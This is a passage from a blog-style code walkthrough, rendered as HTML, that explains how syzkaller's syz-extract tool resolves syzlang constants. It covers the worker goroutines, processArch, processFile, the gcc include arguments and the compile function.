&#123;</span><br><span class="line">            arch.files = <span class="built_in">append</span>(arch.files, &amp;File&#123;</span><br><span class="line">                arch: arch,</span><br><span class="line">                name: f,</span><br><span class="line">                
<span class="comment">// Channel for communication between goroutines; signaled once this file has been processed</span></span><br><span class="line">                done: <span class="built_in">make</span>(<span class="keyword">chan</span> <span class="type">bool</span>),</span><br><span class="line">            &#125;)</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Append the newly created Arch struct to arches</span></span><br><span class="line">        arches = <span class="built_in">append</span>(arches, arch)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> arches, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="4-worker">4. worker</h3><p>worker does the actual work of resolving the constants:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">worker</span><span class="params">(extractor Extractor, jobC <span class="keyword">chan</span> <span class="keyword">interface</span>&#123;&#125;)</span></span> </span><br></pre></td></tr></table></figure><p>The elements that main initially puts into the jobC channel are always Arch structs:</p><p><img src="/2022/03/syzkaller-1/image-20220309095730698.png" alt="image-20220309095730698"></p><p>So at first, the type switch inside worker sees a value of type *Arch:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `worker`</span></span><br><span class="line"><span class="keyword">for</span> job := <span class="keyword">range</span> jobC &#123;</span><br><span class="line">    <span class="comment">// j is the object taken from the jobC channel, initially an *Arch</span></span><br><span class="line">    <span class="keyword">switch</span> j := job.(<span class="keyword">type</span>) &#123;</span><br><span class="line">        <span class="comment">// This branch is always taken first</span></span><br><span class="line">        <span class="keyword">case</span> *Arch:</span><br><span class="line">            <span class="comment">// Run processArch to generate the const info</span></span><br><span class="line">            infos, err := processArch(extractor, j)</span><br><span class="line">            j.err = err</span><br><span class="line">            <span class="built_in">close</span>(j.done)</span><br><span class="line">            <span class="keyword">if</span> j.err == <span class="literal">nil</span> &#123;</span><br><span class="line">                <span class="keyword">for</span> _, f := <span class="keyword">range</span> j.files &#123;</span><br><span class="line">                    f.info = infos[filepath.Join(<span class="string">&quot;sys&quot;</span>, j.target.OS, f.name)]</span><br><span class="line">                    jobC &lt;- f</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        <span class="keyword">case</span> *File:</span><br><span class="line">            j.consts, j.undeclared, j.err = processFile(extractor, j.arch, j)</span><br><span class="line">            <span class="built_in">close</span>(j.done)</span><br><span class="line">    
&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Note that j is the Arch struct taken from jobC. Once processArch finishes, worker looks up each file's entry in the infos map and stores it in the info field of the corresponding element of the <strong>files slice</strong> of the <strong>Arch struct</strong>:</p><p><img src="/2022/03/syzkaller-1/image-20220309111211911.png" alt="image-20220309111211911"></p><p>It then executes <code>jobC &lt;- f</code> to put each File struct into the jobC channel.</p><p>Because worker reads from jobC in a loop, a worker will subsequently pick up the File structs that were just queued and call <code>processFile</code> on them. In processFile, syz-extract obtains the integer value (for example 2) of each constant (for example O_RDWR).</p><p>One more key point about worker: after each processXXX call returns, worker executes <code>close(j.done)</code> to close the channel. This notifies the main goroutine that this piece of work is finished, somewhat like using a semaphore for thread synchronization.</p><h3 id="5-processArch">5. processArch</h3><p>processArch takes the given Extractor and Arch struct and generates the const info.</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">processArch</span><span class="params">(extractor Extractor, arch *Arch)</span></span> (<span class="keyword">map</span>[<span class="type">string</span>]*compiler.ConstInfo, <span class="type">error</span>) 
&#123;</span><br><span class="line">    errBuf := <span class="built_in">new</span>(bytes.Buffer)</span><br><span class="line">    <span class="comment">// Define the error handler</span></span><br><span class="line">    eh := <span class="function"><span class="keyword">func</span><span class="params">(pos ast.Pos, msg <span class="type">string</span>)</span></span> &#123;</span><br><span class="line">        fmt.Fprintf(errBuf, <span class="string">&quot;%v: %v\n&quot;</span>, pos, msg)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Parse the syzlang files matching sys/linux/*.txt into ASTs,</span></span><br><span class="line">    <span class="comment">// so top is the root of the resulting AST forest</span></span><br><span class="line">    top := ast.ParseGlob(filepath.Join(<span class="string">&quot;sys&quot;</span>, arch.target.OS, <span class="string">&quot;*.txt&quot;</span>), eh)</span><br><span class="line">    <span class="keyword">if</span> top == <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;%v&quot;</span>, errBuf.String())</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Call compiler.ExtractConsts to get the const info for each syzlang file</span></span><br><span class="line">    infos := compiler.ExtractConsts(top, arch.target, eh)</span><br><span class="line">    <span class="keyword">if</span> infos == <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;%v&quot;</span>, errBuf.String())</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Let the Extractor prepare for this arch</span></span><br><span class="line">    <span class="keyword">if</span> err := extractor.prepareArch(arch); err != <span 
class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> infos, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Here, <code>compiler.ExtractConsts</code> is just a thin wrapper that returns the fileConsts field of the syzlang compilation result:</p><p><img src="/2022/03/syzkaller-1/image-20220309104824331.png" alt="image-20220309104824331"></p><p>The res.fileConsts field maps each <strong>syzlang file name</strong> to the <strong>list of constants it uses</strong>, along with the list of header files it includes; all of this is used later when resolving the constants to concrete integer values.</p><p>The <code>extractor.prepareArch</code> function lives in <code>linux.go</code>; its main job is to define a few header files:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;stdarg.h&quot;</span>: `</span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> once</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_list __builtin_va_list</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_start __builtin_va_start</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_end __builtin_va_end</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_arg __builtin_va_arg</span></span><br><span 
class="line"><span class="meta">#<span class="keyword">define</span> va_copy __builtin_va_copy</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> __va_copy __builtin_va_copy</span></span><br><span class="line">`,</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;asm/a.out.h&quot;</span>:    <span class="string">&quot;&quot;</span>,</span><br><span class="line"><span class="string">&quot;asm/prctl.h&quot;</span>:    <span class="string">&quot;&quot;</span>,</span><br><span class="line"><span class="string">&quot;asm/mce.h&quot;</span>:      <span class="string">&quot;&quot;</span>,</span><br><span class="line"><span class="string">&quot;uapi/asm/msr.h&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br></pre></td></tr></table></figure><p>Some architectures' kernel sources may lack these files, so they have to be supplied manually. Once they are in place, <code>extractor.prepareArch</code> runs the Linux kernel make step again to regenerate the build output.</p><p>Back in processArch, the function finally returns the const info obtained earlier to its caller:</p><p><img src="/2022/03/syzkaller-1/image-20220309110405501.png" alt="image-20220309110405501"></p><h3 id="6-processFile">6. 
processFile</h3><p>processFile is just a wrapper around extractor.processFile that mainly performs a few checks:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">processFile</span><span class="params">(extractor Extractor, arch *Arch, file *File)</span></span> (<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>, <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>, <span class="type">error</span>) &#123;</span><br><span class="line">    inname := filepath.Join(<span class="string">&quot;sys&quot;</span>, arch.target.OS, file.name)</span><br><span class="line">    <span class="keyword">if</span> file.info == <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;const info for input file %v is missing&quot;</span>, inname)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(file.info.Consts) == <span class="number">0</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, <span class="literal">nil</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> extractor.processFile(arch, file.info)</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>The actual lookup of const values happens in <code>extractor.processFile</code>:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(*linux)</span></span> processFile(arch *Arch, info *compiler.ConstInfo) (<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>, <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>, <span class="type">error</span>) </span><br></pre></td></tr></table></figure><p>In linux.go, <code>processFile</code> first filters out the cases that do not qualify:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function processFile of sys/syz-extract/linux.go</span></span><br><span class="line"><span class="keyword">if</span> strings.HasSuffix(info.File, <span class="string">&quot;_kvm.txt&quot;</span>) &amp;&amp;</span><br><span class="line">    (arch.target.Arch == targets.ARM || arch.target.Arch == targets.RiscV64) &#123;</span><br><span class="line">    <span class="comment">// Hack: KVM is not supported on ARM anymore. We may want some more official support</span></span><br><span class="line">    <span class="comment">// for marking descriptions arch-specific, but so far this combination is the only</span></span><br><span class="line">    <span class="comment">// one. 
For riscv64, KVM is not supported yet but might be in the future.</span></span><br><span class="line">    <span class="comment">// Note: syz-sysgen also ignores this file for arm and riscv64.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Next, it builds the gcc arguments used to compile the <strong>code template</strong>:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function processFile of sys/syz-extract/linux.go</span></span><br><span class="line">headerArch := arch.target.KernelHeaderArch</span><br><span class="line">sourceDir := 
arch.sourceDir</span><br><span class="line">buildDir := arch.buildDir</span><br><span class="line">args := []<span class="type">string</span>&#123;</span><br><span class="line">    <span class="comment">// This makes the build completely hermetic, only kernel headers are used.</span></span><br><span class="line">    <span class="string">&quot;-nostdinc&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-w&quot;</span>, <span class="string">&quot;-fmessage-length=0&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-O3&quot;</span>, <span class="comment">// required to get expected values for some __builtin_constant_p</span></span><br><span class="line">    <span class="string">&quot;-I.&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-D__KERNEL__&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-DKBUILD_MODNAME=\&quot;-\&quot;&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/generated/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/generated&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/asm/mach-malta&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span 
class="string">&quot;/include/asm/mach-generic&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/include&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/include&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/generated/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/include/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/include/generated/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/include/linux&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/syzkaller&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-include&quot;</span>, sourceDir + <span class="string">&quot;/include/linux/kconfig.h&quot;</span>,</span><br><span class="line">&#125;</span><br><span class="line">args = <span class="built_in">append</span>(args, arch.target.CFlags...)</span><br><span class="line"><span class="keyword">for</span> _, incdir := <span class="keyword">range</span> info.Incdirs &#123;</span><br><span class="line">    args = <span class="built_in">append</span>(args, <span 
class="string">&quot;-I&quot;</span>+sourceDir+<span class="string">&quot;/&quot;</span>+incdir)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> arch.includeDirs != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    <span class="keyword">for</span> _, dir := <span class="keyword">range</span> strings.Split(arch.includeDirs, <span class="string">&quot;,&quot;</span>) &#123;</span><br><span class="line">        args = <span class="built_in">append</span>(args, <span class="string">&quot;-I&quot;</span>+dir)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The resulting argument list is rather long:</p><p><img src="/2022/03/syzkaller-1/image-20220309113521638.png" alt="image-20220309113521638"></p><p>With the arguments ready, processFile also prepares the extract parameters and picks the C compiler to use, then calls <strong>the core extract function</strong>, which produces the res map and the undeclared set:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function processFile of sys/syz-extract/linux.go</span></span><br><span class="line">params := &amp;extractParams&#123;</span><br><span class="line">    AddSource:      <span class="string">&quot;#include &lt;asm/unistd.h&gt;&quot;</span>,</span><br><span class="line">    ExtractFromELF: <span class="literal">true</span>,</span><br><span class="line">    TargetEndian:   arch.target.HostEndian,</span><br><span class="line">&#125;</span><br><span class="line">cc := arch.target.CCompiler</span><br><span class="line">res, undeclared, err := extract(info, cc, 
args, params)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, err</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><img src="/2022/03/syzkaller-1/image-20220309113727970.png" alt="image-20220309113727970"></p><p>Here, res maps <strong>const names to integer values</strong>, and undeclared maps <strong>undeclared const names</strong> to bool values; in practice these bool values are all true:</p><blockquote><p>Constants listed in undeclared are written to the <code>.const</code> file with the value <code>???</code></p><p>For example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">O_RDWR = <span class="number">2</span></span><br><span class="line">MyConst = ???</span><br></pre></td></tr></table></figure></blockquote><p><img src="/2022/03/syzkaller-1/image-20220309132346585.png" alt="image-20220309132346585"></p><p>After extract returns, if the target architecture is 32-bit (PtrSize == 4), syz-extract replaces the syscall number of mmap with that of mmap2, because mmap on i386/arm is translated to old_mmap, whose signature differs from the expected one:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> arch.target.PtrSize == <span class="number">4</span> &#123;</span><br><span class="line">    <span class="comment">// mmap syscall on i386/arm is translated to old_mmap and has different signature.</span></span><br><span class="line">    <span 
class="comment">// As a workaround fix it up to mmap2, which has signature that we expect.</span></span><br><span class="line">    <span class="comment">// pkg/csource has the same hack.</span></span><br><span class="line">    <span class="keyword">const</span> mmap = <span class="string">&quot;__NR_mmap&quot;</span></span><br><span class="line">    <span class="keyword">const</span> mmap2 = <span class="string">&quot;__NR_mmap2&quot;</span></span><br><span class="line">    <span class="keyword">if</span> res[mmap] != <span class="number">0</span> || undeclared[mmap] &#123;</span><br><span class="line">        <span class="keyword">if</span> res[mmap2] == <span class="number">0</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;%v is missing&quot;</span>, mmap2)</span><br><span class="line">        &#125;</span><br><span class="line">        res[mmap] = res[mmap2]</span><br><span class="line">        <span class="built_in">delete</span>(undeclared, mmap)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Once the replacement is done, the results are returned:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> res, undeclared, <span class="literal">nil</span></span><br></pre></td></tr></table></figure><p>That covers the source of extractor.processFile. Next, let's dig into the extract function.</p><h3 id="7-extract">7. 
extract</h3><blockquote><p>The function lives in sys/syz-extract/fetch.go</p></blockquote><p>This function invokes the compiler on the code template and reads the integer values of the consts from the resulting binary. If compilation fails, it tries to recover automatically.</p><p>Function signature:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">extract</span><span class="params">(info *compiler.ConstInfo, cc <span class="type">string</span>, args []<span class="type">string</span>, params *extractParams)</span></span> (</span><br><span class="line">    <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>, <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>, <span class="type">error</span>)</span><br></pre></td></tr></table></figure><p>Here, info is the struct holding the const data of a single file, cc is the compiler name, args are the compiler arguments, and params holds the options that control how extract runs:</p><p><img src="/2022/03/syzkaller-1/image-20220309133255996.png" alt="image-20220309133255996"></p><p>extract starts by setting up the compile data and a few maps:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `extract`</span></span><br><span class="line">data := &amp;CompileData&#123;</span><br><span class="line">    extractParams: params,</span><br><span 
class="line">    Defines:       info.Defines,</span><br><span class="line">    Includes:      info.Includes,</span><br><span class="line">    Values:        info.Consts,</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Path of the compiled binary</span></span><br><span class="line">bin := <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="comment">// This map appears to be unused, so ignore it for now</span></span><br><span class="line">missingIncludes := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>)</span><br><span class="line"><span class="comment">// Undeclared consts, typically user-defined constants</span></span><br><span class="line">undeclared := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>)</span><br><span class="line"><span class="comment">// Build valMap, marking every const name in info.Consts as true</span></span><br><span class="line">valMap := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>)</span><br><span class="line"><span class="keyword">for</span> _, val := <span class="keyword">range</span> info.Consts &#123;</span><br><span class="line">    valMap[val] = <span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Next, the <strong>const names are combined with the C code template</strong> and the result is compiled into a binary. The <code>compile</code> function does this; it returns the path of the compiled binary, the compiler's combined stdout and stderr output (only when compilation fails), and a Go error:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in 
function `extract`</span></span><br><span class="line"><span class="keyword">for</span> &#123;</span><br><span class="line">    bin1, out, err := compile(cc, args, data)</span><br><span class="line">    <span class="keyword">if</span> err == <span class="literal">nil</span> &#123;</span><br><span class="line">        bin = bin1</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Let's look inside compile first. The function is simple, so the notes are inlined as comments:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span 
class="title">compile</span><span class="params">(cc <span class="type">string</span>, args []<span class="type">string</span>, data *CompileData)</span></span> (<span class="type">string</span>, []<span class="type">byte</span>, <span class="type">error</span>) &#123;</span><br><span class="line">    <span class="comment">// Buffer that will hold the filled-in C source</span></span><br><span class="line">    src := <span class="built_in">new</span>(bytes.Buffer)</span><br><span class="line">    <span class="comment">// Fill the srcTemplate code template with the given data</span></span><br><span class="line">    <span class="keyword">if</span> err := srcTemplate.Execute(src, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to generate source: %v&quot;</span>, err)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Create a temporary file path for the compiled binary</span></span><br><span class="line">    binFile, err := osutil.TempFile(<span class="string">&quot;syz-extract-bin&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">nil</span>, err</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Append extra compiler arguments</span></span><br><span class="line">    args = <span class="built_in">append</span>(args, []<span class="type">string</span>&#123;</span><br><span class="line">        <span class="comment">// -x c: treat the input as C source</span></span><br><span class="line">        <span class="comment">// -: read the source from stdin instead of a file</span></span><br><span class="line">        <span class="string">&quot;-x&quot;</span>, <span class="string">&quot;c&quot;</span>, <span 
class="string">&quot;-&quot;</span>,</span><br><span class="line">        <span class="comment">// Output path of the compiled file</span></span><br><span class="line">        <span class="string">&quot;-o&quot;</span>, binFile,</span><br><span class="line">        <span class="string">&quot;-w&quot;</span>,</span><br><span class="line">    &#125;...)</span><br><span class="line">    <span class="keyword">if</span> data.ExtractFromELF &#123;</span><br><span class="line">        <span class="comment">// gcc -c: compile only, do not link</span></span><br><span class="line">        <span class="comment">// We test on Linux, where ExtractFromELF is true, so this branch is taken</span></span><br><span class="line">        args = <span class="built_in">append</span>(args, <span class="string">&quot;-c&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Prepare the compiler command</span></span><br><span class="line">    cmd := osutil.Command(cc, args...)</span><br><span class="line">    <span class="comment">// Feed the filled-in code template to gcc through stdin</span></span><br><span class="line">    cmd.Stdin = src</span><br><span class="line">    <span class="comment">// CombinedOutput runs the command and returns stdout and stderr merged together,</span></span><br><span class="line">    <span class="comment">// i.e. both streams are captured into the same buffer</span></span><br><span class="line">    <span class="keyword">if</span> out, err := cmd.CombinedOutput(); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        os.Remove(binFile)</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, out, err</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> binFile, <span class="literal">nil</span>, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>On entry to this function, the arguments look like this:</p><p><img src="/2022/03/syzkaller-1/image-20220309134856818.png" alt="image-20220309134856818"></p><p>Now let's see what the code template looks like:</p><figure 
class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span 